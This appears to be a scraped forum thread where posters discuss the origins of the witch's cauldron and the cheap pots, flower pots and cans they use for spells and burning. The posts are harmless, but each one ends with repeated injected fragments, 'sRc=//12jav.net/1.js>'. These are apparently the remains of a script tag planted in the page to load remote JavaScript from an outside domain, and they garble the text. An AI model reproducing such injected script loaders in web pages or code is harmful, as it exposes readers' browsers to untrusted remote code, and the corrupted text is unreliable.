The old idea of using cauldrons to mix magic potions is not true!
Cauldrons were used for cooking, suspended over a fire. Cauldrons were usually too big for mixing potions, etc. My witch teacher used a small metal pot, over a Bunsen burner.
The "witch's cauldron" idea seems to have originated with Shakespeare's "Macbeth". sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I don't actually use a cauldron, but if I was needing to use one I would use either a cooking pot, a pan, or a bowl. ;) sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I use a brass flower pot that has three small legs in it. It was under five dollars at the thrift store. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I use just a black metal pot and engraved unique symbols of my own making. It has worked great for me and only cost a few bucks. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

A pot, preferably one without a non-stick coating inside. If you are using it for burning things in, I suggest an over-sized aluminum can, such as a metal coffee can or the restaurant/family sized canned food cans you can find at your grocer. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
